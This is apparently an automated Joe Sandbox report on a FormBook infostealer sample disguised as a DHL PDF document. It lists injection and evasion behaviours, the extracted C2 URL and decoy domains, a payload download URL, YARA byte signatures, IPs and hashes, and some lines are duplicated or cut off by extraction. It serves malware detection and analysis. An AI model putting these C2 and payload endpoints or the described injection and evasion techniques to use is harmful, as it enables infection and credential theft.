Automated Malware Analysis Report for DHL_119040 ...

ID: 507998Sample Name: DHL_119040Belegdokument,pdf.exeCookbook: default.jbsTime: 07:58:22Date: 23/10/2021Version: 33.0.0 White Diamond

24444444445567777777777888899

101010101011111111111111111212121212131314141515151515161616161616

161616161616171717182122

Table of Contents

Table of ContentsWindows Analysis Report DHL_119040 Belegdokument,pdf.exe

OverviewGeneral InformationDetectionSignaturesClassification

Process TreeMalware Configuration

Threatname: FormBookYara Overview

Memory DumpsUnpacked PEs

Sigma OverviewJbx Signature Overview

AV Detection:Networking:E-Banking Fraud:System Summary:Data Obfuscation:Hooking and other Techniques for Hiding and Protection:Malware Analysis System Evasion:HIPS / PFW / Operating System Protection Evasion:Stealing of Sensitive Information:Remote Access Functionality:

Mitre Att&ck MatrixBehavior GraphScreenshots

ThumbnailsAntivirus, Machine Learning and Genetic Malware Detection

Initial SampleDropped FilesUnpacked PE FilesDomainsURLs

Domains and IPsContacted DomainsContacted URLsURLs from Memory and BinariesContacted IPsPublic

General InformationSimulations

Behavior and APIsJoe Sandbox View / Context

IPsDomainsASNJA3 FingerprintsDropped Files

Created / dropped FilesStatic File Info

GeneralFile IconStatic PE Info

GeneralEntrypoint PreviewData DirectoriesSectionsResourcesImportsVersion Infos

Network BehaviorSnort IDS AlertsNetwork Port DistributionTCP PacketsUDP PacketsDNS QueriesDNS AnswersHTTP Request Dependency GraphHTTP PacketsHTTPS Proxied Packets

Code ManipulationsStatistics

Copyright Joe Security LLC 2021 of 25

2222222222222222

22

23232323

232324

24242424

25252525

2525

2525

BehaviorSystem Behavior

Analysis Process: DHL_119040 Belegdokument,pdf.exe PID: 6884 Parent PID: 5256GeneralFile Activities

File CreatedFile WrittenFile Read

Registry Activities

Analysis Process: DHL_119040 Belegdokument,pdf.exe PID: 5776 Parent PID: 6884GeneralFile Activities

File Read

Analysis Process: explorer.exe PID: 3424 Parent PID: 5776GeneralFile Activities

Analysis Process: mstsc.exe PID: 5176 Parent PID: 3424GeneralFile Activities

File Read

Analysis Process: cmd.exe PID: 3144 Parent PID: 5176GeneralFile Activities

File Deleted

Analysis Process: conhost.exe PID: 3240 Parent PID: 3144General

DisassemblyCode Analysis


Windows Analysis Report DHL_119040 Belegdokument,pdf.exe…

Overview

General Information

Sample Name:

DHL_119040 Belegdokument,pdf.exe

Analysis ID: 507998

MD5: d64f5d6117d03df…

SHA1: 1eed6ad06babb3…

SHA256: ca08a2e70dac67…

Tags: DEU DHL exe geo

Infos:

Most interesting Screenshot:

Detection

FormBookFormBook

Score: 100

Range: 0 - 100

Whitelisted: false

Confidence: 100%

Signatures

Found malware configuration






Found malware configurationFound malware configuration

Snort IDS alert for network traffic (e.






Snort IDS alert for network traffic (e.Snort IDS alert for network traffic (e.……

Multi AV Scanner detection for subm






Multi AV Scanner detection for submMulti AV Scanner detection for subm……

Yara detected FormBook






Yara detected FormBookYara detected FormBook

Icon mismatch, binary includes an ic






Icon mismatch, binary includes an icIcon mismatch, binary includes an ic……

Malicious sample detected (through






Malicious sample detected (through Malicious sample detected (through ……

System process connects to networ






System process connects to networSystem process connects to networ……

Antivirus detection for URL or domain






Antivirus detection for URL or domainAntivirus detection for URL or domain

Multi AV Scanner detection for dropp






Multi AV Scanner detection for droppMulti AV Scanner detection for dropp……

Sample uses process hollowing tech






Sample uses process hollowing techSample uses process hollowing tech……

Maps a DLL or memory area into an






Maps a DLL or memory area into anMaps a DLL or memory area into an……

Writes to foreign memory regions






Writes to foreign memory regionsWrites to foreign memory regions

Machine Learning detection for samp






Machine Learning detection for sampMachine Learning detection for samp……

Allocates memory in foreign process






Allocates memory in foreign processAllocates memory in foreign process……

Performs DNS queries to domains w






Performs DNS queries to domains wPerforms DNS queries to domains w……

Self deletion via cmd delete






Self deletion via cmd deleteSelf deletion via cmd delete

.NET source code contains potentia






.NET source code contains potentia.NET source code contains potentia……

Injects a PE file into a foreign proce






Injects a PE file into a foreign proceInjects a PE file into a foreign proce……

Queues an APC in another process






Queues an APC in another process Queues an APC in another process ……

Tries to detect virtualization through






Tries to detect virtualization throughTries to detect virtualization through……

Machine Learning detection for dropp






Machine Learning detection for droppMachine Learning detection for dropp……

Modifies the context of a thread in a






Modifies the context of a thread in aModifies the context of a thread in a……

C2 URLs / IPs found in malware con






C2 URLs / IPs found in malware conC2 URLs / IPs found in malware con……

Uses 32bit PE files

Uses 32bit PE files

Uses 32bit PE files

Uses 32bit PE files

Uses 32bit PE files

Uses 32bit PE files

Uses 32bit PE filesUses 32bit PE files

Queries the volume information (nam






Queries the volume information (namQueries the volume information (nam……

Yara signature match






Yara signature matchYara signature match

Antivirus or Machine Learning detec






Antivirus or Machine Learning detecAntivirus or Machine Learning detec……

May sleep (evasive loops) to hinder






May sleep (evasive loops) to hinder May sleep (evasive loops) to hinder ……

Uses code obfuscation techniques (






Uses code obfuscation techniques (Uses code obfuscation techniques (……

Internet Provider seen in connection






Internet Provider seen in connectionInternet Provider seen in connection……

Detected potential crypto function






Detected potential crypto functionDetected potential crypto function

Found potential string decryption / a






Found potential string decryption / aFound potential string decryption / a……

Sample execution stops while proce






Sample execution stops while proceSample execution stops while proce……

JA3 SSL client fingerprint seen in co






JA3 SSL client fingerprint seen in coJA3 SSL client fingerprint seen in co……

Contains functionality to call native f






Contains functionality to call native fContains functionality to call native f……

HTTP GET or POST without a user






HTTP GET or POST without a user HTTP GET or POST without a user ……

IP address seen in connection with o






IP address seen in connection with oIP address seen in connection with o……

Contains functionality for execution






Contains functionality for execution Contains functionality for execution ……

Contains long sleeps (>= 3 min)






Contains long sleeps (>= 3 min)Contains long sleeps (>= 3 min)

Enables debug privileges






Enables debug privilegesEnables debug privileges

Creates a DirectInput object (often fo






Creates a DirectInput object (often foCreates a DirectInput object (often fo……

Found inlined nop instructions (likely






Found inlined nop instructions (likelyFound inlined nop instructions (likely……

Sample file is different than original






Sample file is different than original Sample file is different than original ……

Classification

Ransomware

Spreading

Phishing

Banker

Trojan / Bot

Adware

Spyware

Exploiter

Evader

Miner

clean

clean

clean

clean

clean

clean

clean

suspicious

suspicious

suspicious

suspicious

suspicious

suspicious

suspicious

malicious

malicious

malicious

malicious

malicious

malicious

malicious

System is w10x64

DHL_119040 Belegdokument,pdf.exe (PID: 6884 cmdline: 'C:\Users\user\Desktop\DHL_119040 Belegdokument,pdf.exe' MD5: D64F5D6117D03DFB20CFA1555D0F4BD8)

DHL_119040 Belegdokument,pdf.exe (PID: 5776 cmdline: C:\Users\user\AppData\Local\Temp\DHL_119040 Belegdokument,pdf.exe MD5:

D64F5D6117D03DFB20CFA1555D0F4BD8)explorer.exe (PID: 3424 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)

mstsc.exe (PID: 5176 cmdline: C:\Windows\SysWOW64\mstsc.exe MD5: 2412003BE253A515C620CE4890F3D8F3)

cmd.exe (PID: 3144 cmdline: /c del 'C:\Users\user\AppData\Local\Temp\DHL_119040 Belegdokument,pdf.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)

conhost.exe (PID: 3240 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

cleanup

Process Tree

Malware Configuration

Threatname: FormBook


{

"C2 list": [

"www.melindair.xyz/g8ne/"

],

"decoy": [

"freesiacreations.com",

"ecopolymer.group",

"ahb9.com",

"ramapuramholdings.com",

"urban-gourmets.com",

"8xaocu.xyz",

"lancasteremerald.com",

"aktau.group",

"thebeachseekers.com",

"ki5rod.com",

"nmsships.com",

"dppu56.com",

"hairwegoca.net",

"aratakablogz.com",

"staunchgomkdt.xyz",

"leslaw.us",

"restaurantperladelmare.com",

"martensakcio.com",

"motherssecret.store",

"deersolutionsfranchising.com",

"gulfgroupeg.com",

"slapcheating.com",

"gracemakesmaps.com",

"manganyuk.com",

"allkhalf.store",

"spdh08.xyz",

"africanspots.com",

"francesmaydesign.com",

"marnannyc.com",

"auxiliaradministrativo.club",

"caesarscaisno.com",

"high-clicks2.com",

"dxtradeoption.com",

"traly.xyz",

"gestaltadvisors.net",

"mgav64.xyz",

"abogadosafortiori.com",

"dum-directory.xyz",

"southasianrepublicanclub.com",

"alendmaj.com",

"lifebeyondframe.com",

"therisnospoon.xyz",

"ahbeck.net",

"noordinarylogistics.com",

"hscbbank.com",

"trespasos.biz",

"sns-regionv.com",

"macdonalds-delivery.xyz",

"currybunny.com",

"dailytoyotatuson.com",

"cottonhome.online",

"escueladelbuenamor.com",

"66jt66.com",

"iivorfloral.com",

"estide.com",

"ababstone.xyz",

"trianyxmail.com",

"igorshestakov.com",

"pfgbltd.com",

"exceed-davinci.com",

"kloeyscloset.com",

"zp0ey8.xyz",

"q8pinoy.com",

"xn--fjqs5e79kw6e.com"

]

}

Source Rule Description Author Strings

00000000.00000002.743735543.0000000003A61000.00000004.00000001.sdmp

JoeSecurity_FormBook Yara detected FormBook

Joe Security

Yara Overview

Memory Dumps


00000000.00000002.743735543.0000000003A61000.00000004.00000001.sdmp

Formbook_1 autogenerated rule brought to you by yara-signator

Felix Bilstein - yara-signator at cocacoding dot com

0x8b58:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC0x8ef2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC0x14c05:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 2574 940x146f1:$sequence_2: 3B 4F 14 73 95 85 C9 74 910x14d07:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F0x14e7f:$sequence_4: 5D C3 8D 50 7C 80 FA 070x990a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 060x1396c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F80xa682:$sequence_7: 66 89 0C 02 5B 8B E5 5D0x1a0f7:$sequence_8: 3C 54 74 04 3C 74 75 F40x1b19a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00

00000000.00000002.743735543.0000000003A61000.00000004.00000001.sdmp

Formbook detect Formbook in memory

JPCERT/CC Incident Response Group

0x17029:$sqlite3step: 68 34 1C 7B E10x1713c:$sqlite3step: 68 34 1C 7B E10x17058:$sqlite3text: 68 38 2A 90 C50x1717d:$sqlite3text: 68 38 2A 90 C50x1706b:$sqlite3blob: 68 53 D8 7F 8C0x17193:$sqlite3blob: 68 53 D8 7F 8C

00000009.00000002.817684603.0000000000DA0000.00000040.00020000.sdmp

JoeSecurity_FormBook Yara detected FormBook

Joe Security

00000009.00000002.817684603.0000000000DA0000.00000040.00020000.sdmp

Formbook_1 autogenerated rule brought to you by yara-signator


0x8608:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC0x89a2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC0x146b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 2574 940x141a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 910x147b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F0x1492f:$sequence_4: 5D C3 8D 50 7C 80 FA 070x93ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 060x1341c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F80xa132:$sequence_7: 66 89 0C 02 5B 8B E5 5D0x19ba7:$sequence_8: 3C 54 74 04 3C 74 75 F40x1ac4a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00

Click to see the 30 entries



9.0.DHL_119040 Belegdokument,pdf.exe.400000.3.unpack JoeSecurity_FormBook Yara detected FormBook

Joe Security

9.0.DHL_119040 Belegdokument,pdf.exe.400000.3.unpack Formbook_1 autogenerated rule brought to you by yara-signator


0x7808:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC0x7ba2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC0x138b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 2574 940x133a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 910x139b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F0x13b2f:$sequence_4: 5D C3 8D 50 7C 80 FA 070x85ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 060x1261c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F80x9332:$sequence_7: 66 89 0C 02 5B 8B E5 5D0x18da7:$sequence_8: 3C 54 74 04 3C 74 75 F40x19e4a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00

9.0.DHL_119040 Belegdokument,pdf.exe.400000.3.unpack Formbook detect Formbook in memory

JPCERT/CC Incident Response Group

0x15cd9:$sqlite3step: 68 34 1C 7B E10x15dec:$sqlite3step: 68 34 1C 7B E10x15d08:$sqlite3text: 68 38 2A 90 C50x15e2d:$sqlite3text: 68 38 2A 90 C50x15d1b:$sqlite3blob: 68 53 D8 7F 8C0x15e43:$sqlite3blob: 68 53 D8 7F 8C

9.2.DHL_119040 Belegdokument,pdf.exe.400000.0.unpack JoeSecurity_FormBook Yara detected FormBook

Joe Security

9.2.DHL_119040 Belegdokument,pdf.exe.400000.0.unpack Formbook_1 autogenerated rule brought to you by yara-signator


0x7808:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC0x7ba2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC0x138b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 2574 940x133a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 910x139b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F0x13b2f:$sequence_4: 5D C3 8D 50 7C 80 FA 070x85ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 060x1261c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F80x9332:$sequence_7: 66 89 0C 02 5B 8B E5 5D0x18da7:$sequence_8: 3C 54 74 04 3C 74 75 F40x19e4a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00

Click to see the 10 entries

Unpacked PEs


Sigma Overview

No Sigma rule has matched

Jbx Signature Overview

Click to jump to signature section

AV Detection:


Multi AV Scanner detection for submitted file



Multi AV Scanner detection for dropped file

Machine Learning detection for sample

Machine Learning detection for dropped file

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

System process connects to network (likely due to code injection or exploit)

Performs DNS queries to domains with low reputation

C2 URLs / IPs found in malware configuration

E-Banking Fraud:


System Summary:

Malicious sample detected (through community Yara rule)

Data Obfuscation:

.NET source code contains potential unpacker

Hooking and other Techniques for Hiding and Protection:

Icon mismatch, binary includes an icon from a different legit application in order to fool users


Malware Analysis System Evasion:

Tries to detect virtualization through RDTSC time measurements

HIPS / PFW / Operating System Protection Evasion:

System process connects to network (likely due to code injection or exploit)

Sample uses process hollowing technique


Maps a DLL or memory area into another process


Allocates memory in foreign processes

Injects a PE file into a foreign processes

Queues an APC in another process (thread injection)

Modifies the context of a thread in another process (thread injection)

Stealing of Sensitive Information:


Remote Access Functionality:


Mitre Att&ck Matrix

InitialAccess Execution Persistence

PrivilegeEscalation Defense Evasion

CredentialAccess Discovery

LateralMovement Collection Exfiltration

Commandand Control

NetworkEffects

ValidAccounts

SharedModules 1

PathInterception

ProcessInjection 8 1 2

Masquerading 1 1 InputCapture 1

Security SoftwareDiscovery 2 2 1

RemoteServices

InputCapture 1

ExfiltrationOver OtherNetworkMedium

EncryptedChannel 1 1

Eavesdrop onInsecureNetworkCommunication

DefaultAccounts

ScheduledTask/Job

Boot orLogonInitializationScripts

Boot or LogonInitializationScripts

Disable or ModifyTools 1

LSASSMemory

Process Discovery 2 RemoteDesktopProtocol

ArchiveCollectedData 1 1

ExfiltrationOverBluetooth

Ingress ToolTransfer 3

Exploit SS7 toRedirect PhoneCalls/SMS

DomainAccounts

At (Linux) Logon Script(Windows)

Logon Script(Windows)

Virtualization/SandboxEvasion 3 1

SecurityAccountManager

Virtualization/SandboxEvasion 3 1

SMB/WindowsAdmin Shares

Data fromNetworkSharedDrive

AutomatedExfiltration

Non-ApplicationLayerProtocol 3

Exploit SS7 toTrack DeviceLocation

LocalAccounts

At(Windows)

Logon Script(Mac)

Logon Script(Mac)

ProcessInjection 8 1 2

NTDS Remote SystemDiscovery 1

DistributedComponentObject Model

InputCapture

ScheduledTransfer

ApplicationLayerProtocol 1 4

SIM CardSwap

CloudAccounts

Cron NetworkLogon Script

Network LogonScript

Deobfuscate/DecodeFiles orInformation 1 1

LSASecrets

System InformationDiscovery 1 1 2

SSH Keylogging DataTransferSize Limits

FallbackChannels

ManipulateDeviceCommunication

ReplicationThroughRemovableMedia

Launchd Rc.common Rc.common Obfuscated Files orInformation 3

CachedDomainCredentials

System Owner/UserDiscovery

VNC GUI InputCapture

ExfiltrationOver C2Channel

MultibandCommunication

Jamming orDenial ofService

ExternalRemoteServices

ScheduledTask

StartupItems

Startup Items SoftwarePacking 1 1

DCSync Network Sniffing WindowsRemoteManagement

WebPortalCapture

ExfiltrationOverAlternativeProtocol

CommonlyUsed Port

Rogue Wi-FiAccess Points

Drive-byCompromise

CommandandScriptingInterpreter

ScheduledTask/Job

ScheduledTask/Job

File Deletion 1 ProcFilesystem

Network ServiceScanning

SharedWebroot

CredentialAPIHooking

ExfiltrationOverSymmetricEncryptedNon-C2Protocol

ApplicationLayer Protocol

Downgrade toInsecureProtocols

Behavior Graph


Behavior Graph

ID: 507998

Sample: DHL_119040 Belegdokument,pdf.exe

Startdate: 23/10/2021

Architecture: WINDOWS

Score: 100

Snort IDS alert fornetwork traffic (e.g.

based on Emerging Threatrules)

Found malware configurationMalicious sample detected(through community Yara

rule)10 other signatures


15 5

started

store2.gofile.io

31.14.69.10, 443, 49744

LINKER-ASFR

Virgin Islands (BRITISH)

C:\Users\...\DHL_119040 Belegdokument,pdf.exe, PE32

dropped

DHL_119040 Belegdo...exe:Zone.Identifier, ASCII

dropped

C:\...\DHL_119040 Belegdokument,pdf.exe.log, ASCII

dropped

Writes to foreign memoryregions

Allocates memory inforeign processes

Injects a PE file intoa foreign processes


started

Modifies the contextof a thread in another

process (thread injection)

Maps a DLL or memoryarea into another process

Sample uses processhollowing technique

Queues an APC in anotherprocess (thread injection)

explorer.exe

injected

dum-directory.xyz

185.61.153.97, 49827, 80

NAMECHEAP-NETUS

United Kingdom

www.mgav64.xyz

45.128.51.66, 49831, 80

DEDIPATH-LLCUS

Netherlands

www.dum-directory.xyz

System process connectsto network (likely dueto code injection or

exploit)

Performs DNS queriesto domains with low

reputation

mstsc.exe

started

Self deletion via cmddelete

Modifies the contextof a thread in another

process (thread injection)

Maps a DLL or memoryarea into another process

Tries to detect virtualizationthrough RDTSC time measurements

cmd.exe

1

started

conhost.exe

started

Legend:

Process

Signature

Created File

DNS/IP Info

Is Dropped

Is Windows Process

Number of created Registry Values

Number of created Files

Visual Basic

Delphi

Java

.Net C# or VB.NET

C, C++ or other language

Is malicious

Internet

Hide Legend

ThumbnailsThis section contains all screenshots as thumbnails, including those not shown in the slideshow.

Screenshots


Source Detection Scanner Label Link

DHL_119040 Belegdokument,pdf.exe 40% Virustotal Browse

DHL_119040 Belegdokument,pdf.exe 59% ReversingLabs ByteCode-MSIL.Trojan.AgentTesla

DHL_119040 Belegdokument,pdf.exe 100% Joe Sandbox ML


C:\Users\user\AppData\Local\Temp\DHL_119040 Belegdokument,pdf.exe 100% Joe Sandbox ML

C:\Users\user\AppData\Local\Temp\DHL_119040 Belegdokument,pdf.exe 59% ReversingLabs ByteCode-MSIL.Trojan.AgentTesla

Source Detection Scanner Label Link Download

9.0.DHL_119040 Belegdokument,pdf.exe.400000.3.unpack 100% Avira TR/Crypt.ZPACK.Gen Download File



Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains


https://www.virustotal.com/gui/file/ca08a2e70dac67086919a22c1b4bdf3f0f2578cb446ca74c8e599f71d0849e55/detection/f-ca08a2e70dac67086919a22c1b4bdf3f0f2578cb446ca74c8e599f71d0849e55-1634925657

General Information

Joe Sandbox Version: 33.0.0 White Diamond

Analysis ID: 507998

Start date: 23.10.2021

Start time: 07:58:22

Joe Sandbox Product: CloudBasic

Overall analysis duration: 0h 10m 14s

Hypervisor based Inspection enabled: false

Report type: light

Sample file name: DHL_119040 Belegdokument,pdf.exe

Cookbook file name: default.jbs

Analysis system description: Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211

Number of analysed new started processes analysed:

21

Number of new started drivers analysed: 0

Number of existing processes analysed: 0

Number of existing drivers analysed: 0

Number of injected processes analysed: 0

Technologies: HCA enabledEGA enabledHDC enabledAMSI enabled

No Antivirus matches


www.melindair.xyz/g8ne/ 100% Avira URL Cloud phishing

Name IP Active Malicious Antivirus Detection Reputation

dum-directory.xyz 185.61.153.97 true true unknown

www.mgav64.xyz 45.128.51.66 true true unknown

store2.gofile.io 31.14.69.10 true false high

www.dum-directory.xyz unknown unknown true unknown

Name Malicious Antivirus Detection Reputation

www.melindair.xyz/g8ne/ true Avira URL Cloud: phishing low

https://store2.gofile.io/download/d608af7b-4e99-4d57-8e3d-a6c55d6bc65d/Ilemlfctnrlgmidykbo.jpeg

false high

IP Domain Country Flag ASN ASN Name Malicious

185.61.153.97 dum-directory.xyz United Kingdom 22612 NAMECHEAP-NETUS true

31.14.69.10 store2.gofile.io Virgin Islands (BRITISH) 199483 LINKER-ASFR false

45.128.51.66 www.mgav64.xyz Netherlands 35913 DEDIPATH-LLCUS true

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

Contacted IPs

Public


Analysis Mode: default

Analysis stop reason: Timeout

Detection: MAL

Classification: mal100.troj.evad.winEXE@7/3@3/3

EGA Information: Failed

HDC Information: Successful, ratio: 16.7% (good quality ratio 14.7%)Quality average: 70.2%Quality standard deviation: 33%

HCA Information: Successful, ratio: 100%Number of executed functions: 0Number of non-executed functions: 0

Cookbook Comments: Adjust boot timeEnable AMSIFound application associated with file extension: .exe

Warnings:

Time Type Description

07:59:16 API Interceptor 2x Sleep call for process: DHL_119040 Belegdokument,pdf.exe modified

Match Associated Sample Name / URL SHA 256 Detection Link Context

31.14.69.10 Q-700004637 1004913.exe Get hash malicious Browse

DHL_119040 documento de recibo de la compra,pdf.exe Get hash malicious Browse

CQUOTATION REQUEST4.scr.exe Get hash malicious Browse

DHL_119040 al#U0131#U015f irsaliyesi belgesi,pdf.exe Get hash malicious Browse

REMITTANCE-54324.exe Get hash malicious Browse

ABONOF2201.exe Get hash malicious Browse

ConsoleApp2.exe Get hash malicious Browse

DHL_119040 receipt document,pdf.exe Get hash malicious Browse

Ekstre_0.exe Get hash malicious Browse

ISgxYd9hdl.exe Get hash malicious Browse

REVISED FINAL ORDER LIST-pdf.exe Get hash malicious Browse

s78fLkv2Pe.exe Get hash malicious Browse

Invoice- 245678909 Oil_Field_Swift_remmitance.doc Get hash malicious Browse

Payment Swift Copy_ HSBC Global Banking_pdf.exe Get hash malicious Browse

TB3UeMsBFe.exe Get hash malicious Browse

BawsCaZShD.exe Get hash malicious Browse

payment _copy_oberbank.pdf.exe Get hash malicious Browse

USD43000.exe Get hash malicious Browse

DHL_1012617429350,pdf.exe Get hash malicious Browse

IMG_RFQ70103260100057.exe Get hash malicious Browse


store2.gofile.io Q-700004637 1004913.exe Get hash malicious Browse 31.14.69.10

DHL_119040 documento de recibo de la compra,pdf.exe Get hash malicious Browse 31.14.69.10

CQUOTATION REQUEST4.scr.exe Get hash malicious Browse 31.14.69.10

DHL_119040 al#U0131#U015f irsaliyesi belgesi,pdf.exe Get hash malicious Browse 31.14.69.10

REMITTANCE-54324.exe Get hash malicious Browse 31.14.69.10

ABONOF2201.exe Get hash malicious Browse 31.14.69.10

ConsoleApp2.exe Get hash malicious Browse 31.14.69.10

Show All

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains


https://view.joesandbox.com/analysis/399334/html/none?idtype=webid#static

https://view.joesandbox.com/analysis/399334/html/none?idtype=webid





















































DHL_119040 receipt document,pdf.exe Get hash malicious Browse 31.14.69.10

Ekstre_0.exe Get hash malicious Browse 31.14.69.10

ISgxYd9hdl.exe Get hash malicious Browse 31.14.69.10

REVISED FINAL ORDER LIST-pdf.exe Get hash malicious Browse 31.14.69.10

s78fLkv2Pe.exe Get hash malicious Browse 31.14.69.10

Invoice- 245678909 Oil_Field_Swift_remmitance.doc Get hash malicious Browse 31.14.69.10

Payment Swift Copy_ HSBC Global Banking_pdf.exe Get hash malicious Browse 31.14.69.10

TB3UeMsBFe.exe Get hash malicious Browse 31.14.69.10

BawsCaZShD.exe Get hash malicious Browse 31.14.69.10

payment _copy_oberbank.pdf.exe Get hash malicious Browse 31.14.69.10

USD43000.exe Get hash malicious Browse 31.14.69.10

DHL_1012617429350,pdf.exe Get hash malicious Browse 31.14.69.10

IMG_RFQ70103260100057.exe Get hash malicious Browse 31.14.69.10



NAMECHEAP-NETUS 1111110.pdf.exe Get hash malicious Browse 198.54.122.60

wA5D1yZuTf.exe Get hash malicious Browse 198.54.116.238

SHIPPING DOCUMENT.exe Get hash malicious Browse 198.54.117.218

setup_x86_x64_install.exe Get hash malicious Browse 198.54.116.238

wzDtzP1xsr.exe Get hash malicious Browse 63.250.40.204

triage_dropped_file.exe Get hash malicious Browse 63.250.40.204

Scan_10384648.exe Get hash malicious Browse 198.54.117.212

scan_2210.exe Get hash malicious Browse 63.250.40.204

HzmES4i1r8.exe Get hash malicious Browse 63.250.40.204

e0asVUWzRE.rtf Get hash malicious Browse 63.250.40.204

O7N1fXXvzU.rtf Get hash malicious Browse 63.250.40.204

RFQ 001008102021#U00b7pdf.exe Get hash malicious Browse 63.250.40.204

swift.xlsx Get hash malicious Browse 63.250.40.204

bank details.xlsx Get hash malicious Browse 63.250.40.204

BILL OF LADING.docx Get hash malicious Browse 63.250.40.204

vbc.exe Get hash malicious Browse 63.250.40.204

Docs No-65224XXX [ORDER-2021].exe Get hash malicious Browse 198.54.117.210

Shipping_Doc190dk0lwt837.exe Get hash malicious Browse 198.54.117.210

Tax Receipts.xlsx Get hash malicious Browse 63.250.40.204

FTv1gHQOxJ.exe Get hash malicious Browse 63.250.40.204

LINKER-ASFR Q-700004637 1004913.exe Get hash malicious Browse 31.14.69.10




REMITTANCE-54324.exe Get hash malicious Browse 31.14.69.10

ABONOF2201.exe Get hash malicious Browse 31.14.69.10

ConsoleApp2.exe Get hash malicious Browse 31.14.69.10

DHL_119040 receipt document,pdf.exe Get hash malicious Browse 31.14.69.10

Ekstre_0.exe Get hash malicious Browse 31.14.69.10

ISgxYd9hdl.exe Get hash malicious Browse 31.14.69.10

REVISED FINAL ORDER LIST-pdf.exe Get hash malicious Browse 31.14.69.10

s78fLkv2Pe.exe Get hash malicious Browse 31.14.69.10

Invoice- 245678909 Oil_Field_Swift_remmitance.doc Get hash malicious Browse 31.14.69.10

Payment Swift Copy_ HSBC Global Banking_pdf.exe Get hash malicious Browse 31.14.69.10

TB3UeMsBFe.exe Get hash malicious Browse 31.14.69.10

BawsCaZShD.exe Get hash malicious Browse 31.14.69.10

payment _copy_oberbank.pdf.exe Get hash malicious Browse 31.14.69.10

USD43000.exe Get hash malicious Browse 31.14.69.10

DHL_1012617429350,pdf.exe Get hash malicious Browse 31.14.69.10

IMG_RFQ70103260100057.exe Get hash malicious Browse 31.14.69.10


3b5074b1b5d032e5620f69f9f700ff0e applicationB.exe Get hash malicious Browse 31.14.69.10

applicationB.exe Get hash malicious Browse 31.14.69.10

Injector.exe Get hash malicious Browse 31.14.69.10

ASN

JA3 Fingerprints


















































































































Q-700004637 1004913.exe Get hash malicious Browse 31.14.69.10

tEodoA3rYx.exe Get hash malicious Browse 31.14.69.10

SWAP.exe Get hash malicious Browse 31.14.69.10



2aiZD9auQ0.exe Get hash malicious Browse 31.14.69.10


Documents Of Shipping.exe Get hash malicious Browse 31.14.69.10

Request for quotation.exe Get hash malicious Browse 31.14.69.10

Dhl Parcel.exe Get hash malicious Browse 31.14.69.10

Purchase Order.exe Get hash malicious Browse 31.14.69.10

Proforma invoice INV2.pdf.exe Get hash malicious Browse 31.14.69.10

PROFORMA COPY.exe Get hash malicious Browse 31.14.69.10

HogGrabber.exe Get hash malicious Browse 31.14.69.10

ItroublveTSC.exe Get hash malicious Browse 31.14.69.10

Hazard_nuker.exe Get hash malicious Browse 31.14.69.10

DiscordNukerV6.exe Get hash malicious Browse 31.14.69.10


No context

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\DHL_119040 Belegdokument,pdf.exe.log

Process: C:\Users\user\Desktop\DHL_119040 Belegdokument,pdf.exe

File Type: ASCII text, with CRLF line terminators

Category: modified

Size (bytes): 847

Entropy (8bit): 5.35816127824051

Encrypted: false

SSDEEP: 24:ML9E4Ks2wKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7a:MxHKXwYHKhQnoPtHoxHhAHKzva

MD5: 31E089E21A2AEB18A2A23D3E61EB2167

SHA1: E873A8FC023D1C6D767A0C752582E3C9FD67A8B0

SHA-256: 2DCCE5D76F242AF36DB3D670C006468BEEA4C58A6814B2684FE44D45E7A3F836

SHA-512: A0DB65C3E133856C0A73990AEC30B1B037EA486B44E4A30657DD5775880FB9248D9E1CB533420299D0538882E9A883BA64F30F7263EB0DD62D1C673E7DBA881D

Malicious: true

Reputation: moderate, very likely benign file

